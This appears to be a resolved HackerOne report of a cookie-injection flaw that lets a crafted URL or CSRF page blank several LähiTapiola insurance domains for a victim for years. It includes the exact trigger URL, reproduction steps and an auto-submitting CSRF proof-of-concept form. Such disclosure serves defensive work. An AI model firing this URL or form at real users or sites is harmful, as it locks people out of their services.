Cookie-based client-side denial-of-service to all of the Lähitapiola domains
Unknown
Vulnerability Details
# Cookie-based client-side denial-of-service to all of the Lähitapiola domains
Time of detection: 23.2.2016 03:00-04:00
Affected URL: https://www.lahitapiola.fi/cs/Satellite?pagename=LahiTapiola/LTStatus&cookieName=selectedArea&cookieValue=1&backurl=http://www.lahitapiola.fi
## Description:
After the victim opens the affected URL (by direct URL or via CSRF), the victim cannot access any of the Tapiola-domains (see the list below).
The vulnerability affects anonymous AND authenticated users.
This full client-side denial-of-service will last until the "selectedArea"-cookie expires which is about 10 years from the last login. Customer can recover from the condition by deleting the "selectedArea"-cookie.
## List of domains which cannot be used by the client:
- www.tapiola.fi
- www.lahitapiola.fi
- verkkopalvelu.tapiola.fi
- yrityspalvelu.tapiola.fi
## Steps to reproduce:
1. Navigate either directly or via CSRF-attack to following URL:
- https://www.lahitapiola.fi/cs/Satellite?pagename=LahiTapiola/LTStatus&cookieName=selectedArea&cookieValue=1&backurl=http://www.lahitapiola.fi
2. Try to open www.tapiola.fi and notice that a white screen is returned.
3. Try to open www.lahitapiola.fi and notice that a white screen is returned.
4. Try to open verkkopalvelu.tapiola.fi and notice that a white screen is returned.
5. Try to open yrityspalvelu.tapiola.fi and notice that a white screen is returned.
6. Delete browser cookies and notice that you can now browse the Lähitapiola-website normally.
## CSRF proof-of-concept:
<html>
<body>
<form action="https://www.lahitapiola.fi/cs/Satellite">
<input type="hidden" name="pagename" value="LahiTapiola/LTStatus" />
<input type="hidden" name="cookieName" value="selectedArea" />
<input type="hidden" name="cookieValue" value="1" />
<input type="hidden" name="backurl" value="http://www.lahitapiola.fi" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Actions
View on HackerOneReport Stats
- Report ID: 129001
- State: Closed
- Substate: resolved
- Upvotes: 15